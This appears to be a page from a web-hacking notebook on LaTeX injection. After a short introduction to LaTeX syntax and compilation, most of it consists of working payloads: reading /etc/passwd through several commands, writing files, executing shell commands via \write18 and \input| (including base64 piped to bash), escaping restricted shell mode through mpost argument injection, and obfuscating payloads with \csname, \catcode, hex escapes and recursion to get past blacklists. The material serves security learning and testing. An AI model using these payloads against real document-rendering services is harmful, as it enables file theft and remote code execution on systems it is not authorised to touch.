LaTeX

A powerful language for text markup and document generation, but dangerous for user input

Basics

LaTeX\LaTeX is used in many different contexts, often to create complex expressions like formulas, but it can even create whole documents which is often seen in official research papers.

Syntax

The basic syntax of LaTeX is referencing variables and commands by prefixing words with a \ backslash. To provide arguments to a command, use {} curly braces to surround them. A full document always starts with some small boilerplate defining what type of document it is, and where its contents begin:

helloworld.tex
\documentclass{article}
\begin{document}
Hello, world!
\end{document}

You can define commands yourself using the \newcommand command, and use them throughout the document:

\documentclass{article}
\newcommand{\somecommand}{Hello, world!}
\begin{document}
Result: \somecommand
\end{document}

Result: Hello, world!

Use \renewcommand instead if the command already exists, which will overwrite it

Compiling

A .tex file commonly gets compiled into a .pdf file for publishing, which is as easy as running the pdflatex command on the file:

file.tex
\documentclass{standalone}
\begin{document}
Hello, world!
\end{document}
$ pdflatex file.tex
...
Output written on file.pdf (1 page, 9784 bytes)

During this compilation, all the code included in the source file is executed to generate the resulting PDF. As we will explore more in the Exploitation (Injection) section, there are some dangerous commands that a document may or may not run by the compiler. This depends on a few command-line flags with levels of restriction:

  1. --shell-escape: Enable \write18 completely, allowing any unrestricted shell commands

  2. --shell-restricted: Enable \write18, but only certain predefined 'safe' commands (default)

  3. --no-shell-escape: Disable \write18 completely

Exploitation (Injection)

LaTeX is very powerful and can do almost anything. From reading files to include in the document, to even writing files and executing system commands directly. Because of this, it is always dangerous to run user-provided code with LaTeX, and filter-based protection is hard to implement because of the complexity of the language and all the ways to bypass it.

Contexts

There are a few special contexts where you may be able to inject. Depending on this, you may or may not be able to use certain commands, so it is important to understand how they work.

Preamble

One useful command is \usepackage to import LaTeX packages with extra functionality. This can only be used before \begin in the "preamble". Trying to use it after will result in an error message. For example:

Error
\documentclass{article}
\begin{document}
\usepackage{eurosym}
\euro{13.37}
\end{document}
Success
\documentclass{article}
\usepackage{eurosym}
\begin{document}
\euro{13.37}
\end{document}

If your injection point is after here you will not be able to import new packages, and will have to do with already imported ones.

Formulas (math mode)

By surrounding text with $$ it becomes a formula in LaTeX, which looks slightly different and has different rules. One example I could find is the \url{} command from the hyperref package:

Error
\documentclass{article}
\usepackage{hyperref}
\begin{document}
$\url{https://book.jorianwoltjer.com/}$
\end{document}

This gives a vague error "LaTeX Error: Command $ invalid in math mode", that can be fixed by escaping from the formula. Simply close it again with another $ in your input, perform the commands you want, and then finish again with another formula definition:

Success
\documentclass{article}
\usepackage{hyperref}
\begin{document}
$a$\url{https://book.jorianwoltjer.com/}$b$
\end{document}

File read

Let's start with exploiting. Without any special flags, LaTeX can read and include system files in the output, in a few different ways. One simple way is using \input which runs and includes the specified file as more LaTeX code:

\input{/etc/passwd}

Another similar one is \include with the difference being that it can only include .tex files:

\include{secret}  % includes secret.tex

Both of the above methods include the content as LaTeX code, meaning any weird symbols may throw off the syntax. You may be able to fix parts of the syntax by prefixing it, but there might be cleaner ways designed to include raw data using packages

If the listings package is included, you will have access to the \lstinputlisting command which also reads the file from its argument:

\usepackage{listings}
...
\lstinputlisting{/etc/passwd}

Similarly, the verbatim package also reads text literally:

\usepackage{verbatim}
...
\verbatiminput{/etc/passwd}

A more manual way (without packages) is opening a file and reading its lines:

\newread\file       % define \file variable
\openin\file=/etc/passwd  % open file into variable
\loop\unless\ifeof\file   % keep reading until EOF
    \read\file to\line    % read to \line variable
    \line       % print \line variable
\repeat
\closein\file

This method also executes content as LaTeX, meaning special characters like _ underscores may generate errors. We can patch some of these characters we find using \catcode which changes the category of a character, into meaning a literal character:

\catcode`\_=12  % Print '_' characters literally in the future
\newread\file
...

File write

Similarly to File read, you can open and write to a file:

\newwrite\file
\openout\file=file.txt      % open file for writing into variable
\write\file{Hello, world!}  % write the content
\closeout\outfile
A     % filler because an empty document doesn't execute

Depending on the backend, you may be able to write or overwrite critical files like source code or templates to achieve full Remote Code Execution.

Command Execution (RCE)

LaTeX is so powerful that it can execute system commands from its syntax, in multiple different ways. One is to use the \write18 command that accepts the command you wish to execute as the argument:

\documentclass{article}
\begin{document}
\write18{id > /tmp/pwned}
A     % filler because an empty document doesn't execute
\end{document}

Another less common way is using \input and the | character:

\documentclass{article}
\begin{document}
% short:
\input|id|base64
% alternative:
\input|uname${IFS}-a|base64
\input|echo${IFS}aWQgPiAvdG1wL3B3bmVk|base64${IFS}-d|bash
% simple & flexible:
\input{|"uname -a | base64"}
\end{document}

As explained in Compiling, the list of allowed commands is very restricted by default. The examples above would only execute if --shell-escape was turned on, allowing arbitrary commands.

The default allowed commands are stored in a big configuration file at /usr/share/texmf/web2c/texmf.cnf where there are two interesting settings:

texmf.cnf
% Enable system commands via \write18{...}.  When enabled fully (set to
% t), obviously insecure.  When enabled partially (set to p), only the
% commands listed in shell_escape_commands are allowed.  Although this
% is not fully secure either, it is much better, and so useful that we
% enable it for everything but bare tex.
shell_escape = p

% No spaces in this command list.
% 
% The programs listed here are as safe as any we know: they either do
% not write any output files, respect openout_any, or have hard-coded
% restrictions similar to or higher than openout_any=p.  They also have
% no features to invoke arbitrary other programs, and no known
% exploitable bugs.  All to the best of our knowledge.  They also have
% practical use for being called from TeX.
% 
shell_escape_commands = \
bibtex,bibtex8,\
extractbb,\
gregorio,\
kpsewhich,\
makeindex,\
repstopdf,\
r-mpost,\
texosquery-jre8,\

The shell_escape setting determines the default option in the 3 levels explained above. In the restricted mode the shell_escape_commands variable is used to select which commands are allowed as a comma-separated list. These commands should not allow you to do anything malicious, but there is a history of exploiting some of the functionality in these binaries to still perform some interesting actions.

If plain mpost is allowed (default in earlier versions) the whole protection can be escaped by injecting commands (source). First, any parsable MetaPost file needs to be created to make the command not crash before our payload. This can be an existing file, or possibly a file you created yourself like via uploads:

file.txt
verbatimtex
\documentclass{minimal}
\begin{document}
etex
beginfig (1)
label(btex blah etex, origin);
endfig;
\end{document}
bye

Then the following mpost arguments can execute arbitrary commands:

mpost -ini '-tex=bash -c (id)>/tmp/pwned' file.txt

The example above executes id, but trying a more complex command will run into escaping troubles because spaces don't work. To make this easier, you can simply use ${IFS} to replace the space and use Base64 to describe the real payload (CyberChef):

mpost -ini '-tex=bash -c (base64${IFS}-d<<<aWQgPiAvdG1wL3B3bmVk|bash)' file.txt

Inside of LaTeX, it would look like this:

Method 1
\immediate\write18{mpost -ini '-tex=bash -c (base64${IFS}-d<<<aWQgPiAvdG1wL3B3bmVk|bash)' file.txt}
Method 2
\input{|"mpost -ini '-tex=bash -c (base64${IFS}-d<<<aWQgPiAvdG1wL3B3bmVk|bash)' file.txt"}

Filter Bypass

Commands

Some dangers LaTeX commands might be blocked by a blacklist filter, which is hard to make because there are many tricks to circumvent such filters with alternative methods.

The following paper explores many different ideas for attacking LaTeX files and has some tricks to evading filters (4.5):

One powerful trick if commands are blocked using strings like "\input" is to use \csname which can represent a command without putting a \ in front of the command's name:

\csname input\endcsname{|"id > /tmp/pwned"}
% === equivalent to ===
\input{|"id > /tmp/pwned"}

Another very powerful technique is using \catcode to change the meaning (category) of characters. For example, we could change the X character to mean "escape" just like \ would regularly. This is another way to evade filters that find commands prefixed with backslashes, but can also be used to replace any other special character (see the link for a list of values).

\catcode`X=0                % change meaning of X to 'escape character'
Xinput{|"id > /tmp/pwned"}  % use X as an escape character to run \input

Using the special \makeatletter (make @ letter) you can change the category code of specifically the @ character to use some special encodings of \input:

\makeatletter               % change meaning of @ to 'letter'
\@input{|"id > /tmp/pwned}
\@@input|"id > /tmp/pwned"
\@iinput{|"id > /tmp/pwned}
\@input@{|"id > /tmp/pwned}
% === equivalent to ===
\catcode`\@=11

Using ^^XX hex escape sequences you can also represent any blocked characters literally, meaning that if this way is not blocked, you can evade any filter at all (CyberChef).

% escaped \
^^5cinput{|"id > /tmp/pwned"}
% escaped everything
^^5c^^69^^6e^^70^^75^^74^^7b^^7c^^22^^69^^64^^20^^3e^^20^^2f^^74^^6d^^70^^2f^^70^^77^^6e^^65^^64^^22^^7d
% custom character by changing category
\catcode`X=7                  % change meaning of X to 'superscript' (^)
XX5cinput{|"id > /tmp/pwned}  % replace ^^ with XX

Lastly, by defining your own \begin and \end section, you can get arbitrary commands to be called. The argument in \begin defines the command, and the text in between is the argument. This trick bypasses almost any \ blacklist because it only uses regular \begin and \end:

\begin{input}{|"id > /tmp/pwned"}\end{input}

Tip: While one single of these techniques might not get straight through the filter, combining them can make it even more powerful. Try using one technique to set up another to obfuscate it for any detection there may be

Repeating

A filter might try to prevent loops using \repeat or similar functions, but forget that recursion is also an option. Here is a short command (named \l) that creates a loop for N times, with the first argument being the number of loops, and the second argument being the code to execute:

\renewcommand\l[2]{\ifnum#1>0#2\l{\numexpr#1-1\relax}{#2}\fi}

This can for example be used to read lines in a file:

\newread\file
\openin\file=/etc/passwd
\catcode`_=12
\l{10}{\read\file to\line\line}  % read and print the first 10 lines
\closein\file

To read the entire file, you can also make the EOF stop the recursion inside the command:

% define command \r to read and print a line if not EOF, and then call itself again
\renewcommand\r{\ifeof\file\else\read\file to\line\line\r\fi}
\catcode`_=12
\newread\file
\openin\file=/etc/passwd
\r  % call the read function
\closein\file

Last updated